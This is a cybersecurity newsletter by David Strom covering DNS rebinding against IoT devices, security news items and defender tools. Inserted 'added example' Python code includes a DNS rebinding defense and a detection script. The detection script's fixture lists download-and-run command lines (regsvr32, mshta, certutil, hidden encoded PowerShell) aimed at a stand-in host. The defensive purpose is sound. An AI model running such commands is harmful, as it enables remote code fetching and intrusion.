Inside Security | Inside


David Strom's in-depth cybersecurity news and analysis

DNS rebinding is a little-known technique that has become an increasingly popular exploit. It can turn a victim’s browser into a proxy for attackers, who change the IP address associated with a domain name after the browser has already loaded it. It gives attackers a way to operate behind a network firewall or DHCP server without any restrictions, and users could inadvertently load malware because they think they are browsing a safe website when they aren’t.

Back when the web was relatively new, engineers decided to create what is called the same origin policy. This means that when your browser requests a page on a particular website, only resources located on that domain can be served back. That sounds good, until you bring DNS into the picture. DNS maps between the familiar domain names we type into our browsers and the IP address numbers that actually identify the servers. The same origin policy was set up for these names, not for IP addresses. What if you could fool the browser into thinking that a malicious website was really using the same domain, when the name was actually being pointed at a different address by a faulty DNS server? That is at the heart of DNS rebinding.

So who should worry? Virtually every model of Google Home, Chromecast, Sonos Wi-Fi speakers, Roku streaming devices, and some smart thermostats are vulnerable to this attack, and you could imagine numerous other IoT devices as well. This is a big deal. The attack isn’t so simple to implement, but it can be done and will become more popular.

This article from Craig Young at Tripwire explains how the attack works in theory. He says, “As of now, IoT attack campaigns have been quite successful attacking only publicly exposed devices, but it is only a matter of time before there is too much competition for this low-hanging fruit. Botnet operators will then seek out better techniques for reaching valuable targets on private corporate and home networks.” Young was the source of Brian Krebs’ story that I cited on Tuesday.

The technique has been around for a decade, but you probably haven’t heard of it (see one completely unscientific sample in the screenshot below). More recently, a series of attacks have used it against targets such as Blizzard’s video games, the Transmission torrent client, and several Ethereum cryptocurrency wallets.

In another article, Brandon Dorsey has independently tested a variety of IoT devices and shows you various proofs of concept with Sonos speakers and other smart home devices. To create the attacks, “You have to spin up a malicious DNS server in the cloud, write some custom JavaScript payload targeting a specific service, serve that to a victim on a target network, and then figure out how to use their web browser to pivot to a target machine running that service, which you probably don’t know the IP address of.” As I said, a lot of work but the payoff could be huge.

Both Dorsey and Young have been in touch with the major IoT device vendors, who say they are working on fixes. But what can you do to protect yourself in the meantime? First, reconfigure your home router with a better DNS source, such as OpenDNS or the Cloudflare server. And make sure your browsers are at their most recent patch levels. If you are a developer, add host header validation to your web server. Finally, both Dorsey’s and Young’s posts link to various testing tools you can use to check your own code for the vulnerability, among them Tavis Ormandy’s Simple DNS Rebinding Service.
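A concrete version of the two defenses just mentioned, host header validation on a device's web server and a resolver that refuses answers pointing an outside name at an inside address (the idea behind the rebinding protection in filtering DNS services), as an added Python example. It is not code from this newsletter, from Young or Dorsey, or from any device vendor; every name, address, allow-list entry and the answer sequence at the bottom is constructed for the example, and the "local" address blocks are the standard RFC 1918, loopback and link-local ranges.

```python
"""Two defender-side checks against DNS rebinding (added example, not code
from the newsletter, Young, Dorsey, or any device vendor).

1. Host header validation for a device's embedded web server: after a
   rebind, the browser still sends the attacker's name in the Host
   header, so an exact allow-list comparison rejects the request.
2. Resolver-side filtering: refuse DNS answers that point an external
   name at a private, loopback or link-local address, which is the
   rebinding step itself.

All names and addresses used below are constructed for the example.
"""
import ipaddress
from typing import Iterable, List, Optional, Tuple

# Address blocks that a public name has no business resolving to.
_LOCAL_NETWORKS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",   # RFC 1918
    "127.0.0.0/8", "169.254.0.0/16", "0.0.0.0/8",       # loopback, link-local, "this" net
    "::1/128", "fc00::/7", "fe80::/10",                  # IPv6 loopback, ULA, link-local
)]


def _strip_port(host: str) -> str:
    """Return the host part of a Host header value without any :port.
    Bracketed IPv6 literals such as [::1]:8080 yield ::1."""
    host = host.strip().lower()
    if host.startswith("["):
        end = host.find("]")
        return host[1:end] if end != -1 else host
    # A single colon separates host from port; more than one means a bare
    # IPv6 literal, which is left untouched (and will not match the list).
    return host.rsplit(":", 1)[0] if host.count(":") == 1 else host


def host_header_is_valid(host_header: Optional[str], allowed_hosts: Iterable[str]) -> bool:
    """Accept a request only if its Host header matches the allow-list exactly.

    The allow-list should hold every name and address the device is
    legitimately reached by (e.g. 'speaker.local' and its LAN IP). An
    attacker's domain that has been rebound to this device never matches,
    and a missing header is rejected as well."""
    if not host_header:
        return False
    return _strip_port(host_header) in {h.strip().lower() for h in allowed_hosts}


def answer_is_rebinding(query_name: str, answer_ip: str,
                        local_suffixes: Tuple[str, ...] = (".local", ".lan")) -> bool:
    """Resolver-side check: flag an answer that maps an external name to a
    local address. Names under the local suffixes are exempt, since that
    is exactly what they exist for."""
    name = query_name.lower().rstrip(".")
    if name.endswith(local_suffixes):
        return False
    ip = ipaddress.ip_address(answer_ip)
    return any(ip in net for net in _LOCAL_NETWORKS)


def filter_answers(answers: List[Tuple[str, str, int]]) -> List[Tuple[str, str, int]]:
    """Drop rebinding answers from a list of (name, ip, ttl) records, as a
    filtering resolver would; the survivors are what the client sees."""
    return [a for a in answers if not answer_is_rebinding(a[0], a[1])]


# Constructed answer sequence: the attacker's name first resolves to a public
# (documentation-range) address to deliver the script, then, with a one-second
# TTL, flips to the victim's speaker on the LAN. The third record is a
# legitimate local name and must survive the filter.
CONSTRUCTED_ANSWERS = [
    ("attacker.example", "203.0.113.10", 1),
    ("attacker.example", "192.168.1.20", 1),
    ("speaker.local", "192.168.1.20", 300),
]

if __name__ == "__main__":
    allowed = ["speaker.local", "192.168.1.20"]
    print(filter_answers(CONSTRUCTED_ANSWERS))                 # second record dropped
    print(host_header_is_valid("attacker.example", allowed))   # False: rebound name
    print(host_header_is_valid("192.168.1.20:1400", allowed))  # True: the device itself
```

The allow-list comparison is deliberately exact rather than a suffix or substring match; the point of the defense is that the attacker's name, whatever it resolves to, is not one of the names the device answers for. The resolver check is the same rule that home-router and filtering-resolver "rebinding protection" settings apply, and it is why the first piece of advice above (use a DNS source that implements it) helps even for devices that never validate Host at all.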

I have been following the evolution of digital Estonia for several years and signed up as an eResident last year. In this week’s podcast for Security Ledger, Paul Roberts interviews Taavi Kotka and his four years as the CIO for Estonia. Kotka talks about his accomplishments, including putting various government services online such as voting. Two things you can’t do digitally in Estonia: get married and divorced. (Denmark has had digital divorces for some time, although they are making it somewhat more difficult next year.) Worth a listen.

-- David Strom, editor of Inside Security

1. Another decades-old flaw has been found in several PGP-related clients. Called SigSpoof, it allows hackers to spoof a digital signature and was discovered last week by a researcher. The flaw is present only when using the setting called verbose, which is used to troubleshoot bugs or unexpected behavior. None of the vulnerable programs enables verbose by default. – ARS


2. There is new research (the link will take you to a screencast demonstration) about a vulnerability with Google Home or Chromecast devices. It shows that websites can run a simple script in the background that collects precise location data on people who have these installed anywhere on their local network. The attack works by asking the Google device for a list of nearby wireless networks and then sending that list to Google’s geolocation lookup services. Google is working on a fix, after initially refusing to acknowledge the researcher’s report. – KREBS ON SECURITY

3. Microsoft has patched a major vulnerability in Windows 10 that could allow anyone to break into your computer just by issuing voice commands to Cortana. Here are the published technical details of the flaw, along with a step-by-step proof-of-concept video tutorial. Before the patch, you could also use Cortana to obtain confidential data on a PC. Time to update!

4. Gal Vallerius, a 36-year-old French national, pleaded guilty this week in the U.S. to selling narcotics on the Dark Web under the nickname OxyMonster. US authorities arrested Vallerius at the Atlanta airport in September after he arrived in the U.S. to attend and participate in the World Beard and Mustache Championships. He was found by authorities tracing a Bitcoin-based “tip jar” he used, and his laptop connected him with his crimes. Other dark web criminals use some sort of anonymizing service to hide their identities. Vallerius could face 20 years behind bars. – BLEEPING COMPUTER

5. And in other legal actions, a Belgian man was found guilty of a 16-month campaign of harassment against an author who’s known for campaigning against racism. The man’s identity wasn’t released but between January 2015 and April 2016 the author was attacked on Twitter several times by the same account, @Kafirbrigade. Twitter provided law enforcement with his IP address. My colleague Lisa Vaas tells the story. – NAKED SECURITY (SOPHOS)

6. Here is an informative post that reviews a very subtle AWS privilege escalation method and what you can do to protect yourself against it. It starts with creating new policies that can be tweaked. It isn’t a simple process. Rhino has written an open source program called aws_escalate that you can download here to scan your VMs for exploits. – RHINO SECURITY BLOG

7. Two new Android malware families have been discovered. First is MysteryBot. It packs a banking trojan, keylogger, and ransomware into a single package. It operates on both Android v7 and v8 devices by using a reliable way to time its overlay screens and show them when the user opens and brings an app into the foreground. ThreatFabric researchers say MysteryBot appears to be related to the well-known and highly popular LokiBot trojan. -- FOSSBYTES

Second is HeroRat. It leverages Telegram messaging. It has been spreading since at least August 2017. In March 2018, its source code was made available for free on Telegram hacking channels, and as a result, hundreds of parallel variants of the malware have been circulating in the wild. Attackers lure victims into downloading the RAT by spreading it under various attractive-sounding guises, via third-party app stores, social media and messaging apps. – WE LIVE SECURITY (ESET)

8.  Joshua Adam Schulte once created malware for both the CIA and NSA to break into adversaries' computers. He was indicted Monday by the Department of Justice on 13 charges of allegedly stealing and transmitting thousands of classified materials. The claim is that he was the mastermind behind the Vault 7 leaks. Schulte had been charged last year in New York with possession of child pornography. -- NYTIMES

9. If you have heard about a Chrome security extension from the startup Paladin, move on. Turns out they are selling snake oil, and the extension is close to worthless. This report goes into why and how the devil is in the technical details. -- ZDNET

10. Researchers employing machine learning algorithms have discovered an enormous certificate signing abuse by BrowseFox, a marketing adware plugin that illicitly injects pop-up ads and discount deals. The plugin may be exploited by threat actors by corrupting ads to lead victims to malicious sites and unknowingly download malware. This post takes you through the details of how it works. – TREND MICRO BLOG


I have put together my top ten recent stories (in order from my most to least favorite) about various tools that defenders can use to protect their networks and endpoints. All of the tools mentioned here are free or minimal cost. Some of these posts are a sequence of articles, so there is a lot to review and learn from here. Don’t worry, there are plenty of exploits to cover and I will do so in tomorrow’s newsletter.

-- David Strom, Editor of Inside Security

1. Here is an excellent series of posts from Varonis on various ways to detect hidden malware. The author calls it Living off the Land, in which hackers reuse less well-known Windows utilities to hide script payloads and cloak other activities. It now has three articles: First is an intro to Regsvr32, which allows for JScript or VBScript to be injected into DLLs. Part 2 covers MS HTA, which began life many years ago as a useful development tool that allowed IT people to leverage HTML and JavaScript or VBScript to create webby apps. It still lies in the Windows/System32 folder, and hackers have been taking advantage of it. Part 3 covers Certutil, another Windows utility that is used to display CA info but also can be exploited.

2. Here is a collection of tools that can be used to understand the internal workings of .NET, such as PerfView and SharpView. While not strictly security tools, they can all help you debug your code and find vulnerabilities. – MATT WARREN BLOG

3. Here are some tips on how to improve your web app security from a developer’s perspective. While many developers claim that security can make apps harder to use and to test, that isn’t the case. The author suggests starting from a position of understanding how much effort is going into stopping an intruder and then drawing an appropriate line in the sand, or the code, as the case may be. – DZONE

4. Only half of devops teams integrate application security testing elements in their workflows, according to a new survey. Respondents cited a lack of automated security testing tools, lots of false positives to track down, and other excuses. The post talks about how IT can approach secure devops and invest in more and better security practices. – SECURITY INTELLIGENCE BLOG (IBM)

5. If you were a fan of the Renesys-based Internet Intelligence Map, Oracle has purchased its assets and will continue the practice. You can read my 2014 review of the service in Network World here. The map offers data about ISP outages around the world, showing where potential trouble spots are happening. It has two sections: Country Statistics and Traffic Shifts. – ORACLE BLOG

6. Here is another series of posts about understanding malicious PowerShell scripting techniques that are often used by hackers. The first blog post walked through how to find malicious PowerShell scripts in the System event log, and the various steps to decode them. The second post discusses how the Windows Registry can be another location where malicious PowerShell scripts might be hiding. Both are from Mari DeGrazia’s Another Forensics blog.
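Detection logic for the three utilities the Varonis series covers (item 1 above: Regsvr32, MSHTA, Certutil) and for the base64-encoded PowerShell that DeGrazia's posts show how to decode (item 6), written as one added Python example; it is not code from either blog. It assumes process-creation records with "Image" and "CommandLine" fields, which is what a Sysmon event 1 or a Windows security event 4688 carries once parsed; the records at the bottom are constructed, with example.invalid standing in for any real host.

```python
"""Living-off-the-land detection over process-creation records (added
example, not code from Varonis or Mari DeGrazia). Each record is assumed to
carry 'Image' and 'CommandLine' fields, as Sysmon event 1 or Windows event
4688 would. Rules flag regsvr32 loading a scriptlet, mshta running remote or
inline script, certutil used to download or decode, and PowerShell with an
-EncodedCommand payload, which is decoded (base64 of UTF-16LE) so the
analyst sees the actual command. The sample records are constructed."""
import base64
import re
from typing import Dict, List, Optional, Tuple

# (rule name, regex on the image path, regex on the command line); all case-insensitive.
RULES: List[Tuple[str, str, str]] = [
    ("regsvr32 scriptlet load",
     r"regsvr32\.exe$",
     r"[/-]i:\S*https?://|scrobj\.dll"),
    ("mshta remote or inline script",
     r"mshta\.exe$",
     r"https?://|\b(?:javascript|vbscript):"),
    ("certutil download or decode",
     r"certutil\.exe$",
     r"-urlcache|-decode|-encode"),
    ("powershell encoded command",
     r"powershell(?:_ise)?\.exe$",
     r"-(?:encodedcommand|enc|en|ec|e)\s+[A-Za-z0-9+/=]{16,}"),
]
_COMPILED = [(name, re.compile(img, re.I), re.compile(cmd, re.I)) for name, img, cmd in RULES]
_ENCODED_RE = re.compile(r"-(?:encodedcommand|enc|en|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(command_line: str) -> Optional[str]:
    """Return the plaintext of a -EncodedCommand argument, or None if there
    is none or it is not valid base64-encoded UTF-16LE."""
    match = _ENCODED_RE.search(command_line)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def scan(records: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Run every rule over every record; return one finding per rule hit,
    with the decoded script attached for encoded PowerShell."""
    findings: List[Dict[str, str]] = []
    for rec in records:
        image = rec.get("Image", "")
        cmd = rec.get("CommandLine", "")
        for name, image_re, cmd_re in _COMPILED:
            if not (image_re.search(image) and cmd_re.search(cmd)):
                continue
            finding = {"rule": name, "image": image, "command_line": cmd}
            if name.startswith("powershell"):
                decoded = decode_encoded_command(cmd)
                if decoded is not None:
                    finding["decoded"] = decoded
            findings.append(finding)
    return findings


def _encode_ps(script: str) -> str:
    """Build an -EncodedCommand value the way PowerShell expects it (used
    only to construct the sample record)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed records: four that should fire, two benign ones that should not.
CONSTRUCTED_RECORDS = [
    {"Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": "regsvr32.exe /s /i:http://example.invalid/x.sct scrobj.dll"},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe http://example.invalid/x.hta"},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil.exe -urlcache -split -f http://example.invalid/p.txt p.txt"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc " + _encode_ps("Write-Host sample")},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil.exe -dump"},   # legitimate: display CA info
    {"Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32.exe /s C:\Program Files\Vendor\comp.dll"},   # legitimate registration
]

if __name__ == "__main__":
    for f in scan(CONSTRUCTED_RECORDS):
        print(f["rule"], "->", f.get("decoded", f["command_line"]))
```

The rules key on the combination of the binary and the suspicious argument rather than on the binary alone, because all three utilities and PowerShell have routine legitimate uses (the two benign records above would otherwise drown the real hits). The decoder exists because, as DeGrazia's posts stress, an encoded command line tells you nothing until it is turned back into script; UTF-16LE is the encoding PowerShell uses for -EncodedCommand, so a payload that fails to decode that way is itself worth a look.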
